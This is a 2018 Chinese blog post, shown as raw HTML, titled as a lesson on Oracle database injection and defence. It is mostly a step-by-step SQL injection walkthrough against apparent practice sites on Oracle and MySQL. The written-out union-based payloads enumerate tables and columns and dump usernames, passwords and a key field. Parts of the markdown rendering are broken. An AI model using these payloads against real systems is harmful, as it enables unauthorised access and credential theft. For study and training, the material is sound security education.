<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="第六节：ORACLE数据库注入及防御Oracle安全配置 《Oracle安全配置手册》  Oracle实战注入 判断是否存在注入点，报错即存在    让我们多试一下 同时我们也可以看出此注入点的诸如参数类型 80% 是数字型   确定数据库类型   由于已知是Oracle数据库，我们采用  1(select count(*) from dual)   &amp;gt; 0          //dual">
<meta property="og:type" content="article">
<meta property="og:title" content="ZouKba">
<meta property="og:url" content="http://yoursite.com/2018/11/19/第六节：ORACLE数据库注入及防御/index.html">
<meta property="og:site_name" content="ZouKba">
<meta property="og:description" content="第六节：ORACLE数据库注入及防御Oracle安全配置 《Oracle安全配置手册》  Oracle实战注入 判断是否存在注入点，报错即存在    让我们多试一下 同时我们也可以看出此注入点的诸如参数类型 80% 是数字型   确定数据库类型   由于已知是Oracle数据库，我们采用  1(select count(*) from dual)   &amp;gt; 0          //dual">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-16e149f941d02e0a.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-2deee1c55ec62762.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-23f51a3fc3cef67e.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-3d62d3f2800b8dde.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-9b2ee8c13d6ca15f.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-16250e0e7a9b8f1a.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-e2fd07da1b15d08c.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-87254fcdb5621373.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-c090696c8d4f9dff.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-19468956572d14bb.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11457450-af52133f927d6bba.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2018-11-18T16:53:27.405Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ZouKba">
<meta name="twitter:description" content="第六节：ORACLE数据库注入及防御Oracle安全配置 《Oracle安全配置手册》  Oracle实战注入 判断是否存在注入点，报错即存在    让我们多试一下 同时我们也可以看出此注入点的诸如参数类型 80% 是数字型   确定数据库类型   由于已知是Oracle数据库，我们采用  1(select count(*) from dual)   &amp;gt; 0          //dual">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/11457450-16e149f941d02e0a.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/11/19/第六节：ORACLE数据库注入及防御/">





  <title> | ZouKba</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ZouKba</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/11/19/第六节：ORACLE数据库注入及防御/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zoukba">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ZouKba">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline"></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-11-19T00:54:12+08:00">
                2018-11-19
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="第六节：ORACLE数据库注入及防御"><a href="#第六节：ORACLE数据库注入及防御" class="headerlink" title="第六节：ORACLE数据库注入及防御"></a>第六节：ORACLE数据库注入及防御</h1><h2 id="Oracle安全配置"><a href="#Oracle安全配置" class="headerlink" title="Oracle安全配置"></a>Oracle安全配置</h2><ul>
<li>《Oracle安全配置手册》</li>
</ul>
<h2 id="Oracle实战注入"><a href="#Oracle实战注入" class="headerlink" title="Oracle实战注入"></a>Oracle实战注入</h2><ol>
<li><strong>判断是否存在注入点，报错即存在</strong><br> <img src="https://upload-images.jianshu.io/upload_images/11457450-16e149f941d02e0a.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1.PNG"></li>
</ol>
<ul>
<li><strong>让我们多试一下</strong><br><img src="https://upload-images.jianshu.io/upload_images/11457450-2deee1c55ec62762.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="2.PNG"><br><img src="https://upload-images.jianshu.io/upload_images/11457450-23f51a3fc3cef67e.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="3.PNG"></li>
<li><strong>同时我们也可以看出此注入点的诸如参数类型 80% 是数字型</strong></li>
</ul>
<ol start="2">
<li><strong>确定数据库类型</strong></li>
</ol>
<ul>
<li><p>由于已知是Oracle数据库，我们采用</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(select count(*) from dual)   &gt; 0          //dual 是Oracle特有的数据表，存在则页面返回正常</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p><img src="https://upload-images.jianshu.io/upload_images/11457450-3d62d3f2800b8dde.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="4.PNG"></p>
<ol start="3">
<li><p><strong>确定字段数</strong></p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">order by                       //语句特点是排序</span><br></pre></td></tr></table></figure>
<pre><code>![5.PNG](https://upload-images.jianshu.io/upload_images/11457450-221dc91e52b7ad15.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
</code></pre></li>
</ol>
<p><img src="https://upload-images.jianshu.io/upload_images/11457450-9b2ee8c13d6ca15f.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="6.PNG"></p>
<ul>
<li><strong>2的时候返回正常3的时候则出错，说明可供注入的字段数为2</strong></li>
</ul>
<ol start="4">
<li><p><strong>判断回显位置</strong></p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select 1,2 from dual</span><br></pre></td></tr></table></figure>
<pre><code>![7.PNG](https://upload-images.jianshu.io/upload_images/11457450-b5287ed5401628c7.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
</code></pre></li>
</ol>
<ul>
<li><p><strong>上图发现报错了，于是我们给1，2加上‘’，假设他是个字符型</strong><br><img src="https://upload-images.jianshu.io/upload_images/11457450-16250e0e7a9b8f1a.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="8.PNG"></p>
</li>
<li><p><strong>原来我是那个20% 以及需要把 aLL 去掉</strong><br><img src="https://upload-images.jianshu.io/upload_images/11457450-e2fd07da1b15d08c.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="9.PNG"></p>
</li>
</ul>
<ol start="5">
<li><p><strong>获取数据库名</strong></p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select (select instance_name from v$instance)</span><br></pre></td></tr></table></figure>
<p>  <img src="https://upload-images.jianshu.io/upload_images/11457450-87254fcdb5621373.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="10.PNG"></p>
</li>
<li><p><strong>获取表名</strong></p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select table_name from user_tables where rownum=1            //rownum=1,是让他输出一项数据</span><br></pre></td></tr></table></figure>
<pre><code>![11.PNG](https://upload-images.jianshu.io/upload_images/11457450-30c46f3c9cb1706f.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
</code></pre></li>
</ol>
<ul>
<li><p><strong>虽然得到了一个表，但是显然这个表不是我们想要的</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">like &apos;%user%&apos;               //使用相似查询，查询敏感数据</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p><img src="https://upload-images.jianshu.io/upload_images/11457450-c090696c8d4f9dff.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="12.PNG"></p>
<ol start="7">
<li>获取列名</li>
</ol>
<ul>
<li><p>因为我们有两个字段，可以充分利用这两个字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select column_name from user_tab_columns where rownum = 1 and table_name=&apos;sns_users&apos;</span><br><span class="line">select column_name from user_tab_columns where rownum = 1 and table_name=&apos;sns_users&apos; and (column_name like &apos;%P%&apos;)</span><br></pre></td></tr></table></figure>
<p><img src="https://upload-images.jianshu.io/upload_images/11457450-19468956572d14bb.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="13.PNG"></p>
</li>
</ul>
<ol start="8">
<li><p><strong>获取关键字信息</strong></p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select USER_NAME,USER_PWD from &quot;sns_users&quot;</span><br></pre></td></tr></table></figure>
<p>  <img src="https://upload-images.jianshu.io/upload_images/11457450-af52133f927d6bba.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="14.PNG"></p>
</li>
</ol>
<ul>
<li><p>发现又不是想要的值</p>
<figure class="highlight plain"><figcaption><span>where user_name <> 'hu'```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">  ![15.PNG](https://upload-images.jianshu.io/upload_images/11457450-329cddd24b776d30.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">## MySQL实战注入</span><br><span class="line">1.**确定是否为注入点**</span><br><span class="line">![1.PNG](https://upload-images.jianshu.io/upload_images/11457450-9268dddeb2f38b7d.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">+ 出现了MQo=,经过判断是采用了base64加密</span><br><span class="line">  ![2.PNG](https://upload-images.jianshu.io/upload_images/11457450-537eb21a8ef76060.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">+ 还是采用 and 1=1</span><br><span class="line">  ![3.PNG](https://upload-images.jianshu.io/upload_images/11457450-a278c0d865ece160.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">2. **确定数据库类型，已知是mysql**</span><br></pre></td></tr></table></figure>
<p>   select count(*) from information_schema.tables &gt; 0       //mysql的特殊数据表是 information_schema.(schemata,tables,columns)</p>
   <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">       ![4.PNG](https://upload-images.jianshu.io/upload_images/11457450-6212ba0d8b3aa3f8.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line"></span><br><span class="line">3. **确定诸如参数类型**</span><br><span class="line">+ 由于测试注入点时，已经测试出此注入点80%为数字型</span><br><span class="line">  4. **确定字段数**</span><br><span class="line">     ![5.PNG](https://upload-images.jianshu.io/upload_images/11457450-55e5e7b6ae2f159f.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">     ![6.PNG](https://upload-images.jianshu.io/upload_images/11457450-2dc976364d9caaf1.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">5. **判断回显位置**</span><br><span class="line">+ 需要注意的是在使用union select联合查询的时候要让前面的id=报错，我采用的是id=-1</span><br><span class="line">  ![7.PNG](https://upload-images.jianshu.io/upload_images/11457450-688505c012f23f36.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line"></span><br><span class="line">6.**获取数据库名**</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>database()                    //是获取当前数据库函数<br>version()                       //是获取其主机以及MySQL数据库版本函数<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">![8.PNG](https://upload-images.jianshu.io/upload_images/11457450-cf1f76b319aaf69c.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line"></span><br><span class="line">7. **获取表名**</span><br></pre></td></tr></table></figure></p>
<pre><code>group_concat()            //推荐使用此函数能将相同字段下的值打印在一行内
select group_concat(table_name) from information_schema.tables where table_schema=database()
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">       ![9.PNG](https://upload-images.jianshu.io/upload_images/11457450-92a7f0a5b9d21d51.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line"></span><br><span class="line">8. **获取列名**</span><br></pre></td></tr></table></figure>

select group_concat(column_name) from information_schema.columns where table_name=database() and table_name=&apos;data&apos;
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">       ![10.PNG](https://upload-images.jianshu.io/upload_images/11457450-ef6cb1f3b1caefc6.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">+ data 需要加上&apos;&apos;，不然会出现错误</span><br><span class="line">  ![‘data’.PNG](https://upload-images.jianshu.io/upload_images/11457450-d5c89aaadafe0566.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">9. **获取关键信息**</span><br></pre></td></tr></table></figure>

concat_ws()                                 //连接函数
select concat_ws(&apos;:&apos;,id,thekey) from data
```



  ![11.PNG](https://upload-images.jianshu.io/upload_images/11457450-68a72ed33186684d.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
</code></pre><h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><ul>
<li>要熟知不同数据库的特殊库，特殊表</li>
</ul>
<ol>
<li><p><strong>Oracle 拥有dual 里面只有一行数据</strong></p>
<ul>
<li>instance_name    输出数据库名字</li>
<li>v$instance           存放数据库的表</li>
<li>table_name          表名</li>
<li>user_tables         存放表名的表</li>
<li>column_name     列名</li>
<li>user_tab_columns  存放列的表</li>
</ul>
</li>
<li><p><strong>MySQL</strong></p>
<ul>
<li>information_schema.schemata，tables，columns        存放数据库，表，列的表</li>
<li>table_schema=        需要查询表的数据库</li>
<li>table_name=            需要查询表的表名<h2 id="小结-1"><a href="#小结-1" class="headerlink" title="小结"></a>小结</h2><strong>There is not a heart but has its moments of longing, yearning for something better, nobler and holier than it knows before.</strong></li>
</ul>
</li>
</ol>
<p>每个人都有向往的时候，渴望比以前更美好，更高贵，更神圣的东西。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/17/第五节：mysql学习/" rel="next" title="">
                <i class="fa fa-chevron-left"></i> 
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">zoukba</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#第六节：ORACLE数据库注入及防御"><span class="nav-number">1.</span> <span class="nav-text">第六节：ORACLE数据库注入及防御</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Oracle安全配置"><span class="nav-number">1.1.</span> <span class="nav-text">Oracle安全配置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Oracle实战注入"><span class="nav-number">1.2.</span> <span class="nav-text">Oracle实战注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#小结"><span class="nav-number">1.2.1.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小结-1"><span class="nav-number">1.3.</span> <span class="nav-text">小结</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zoukba</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
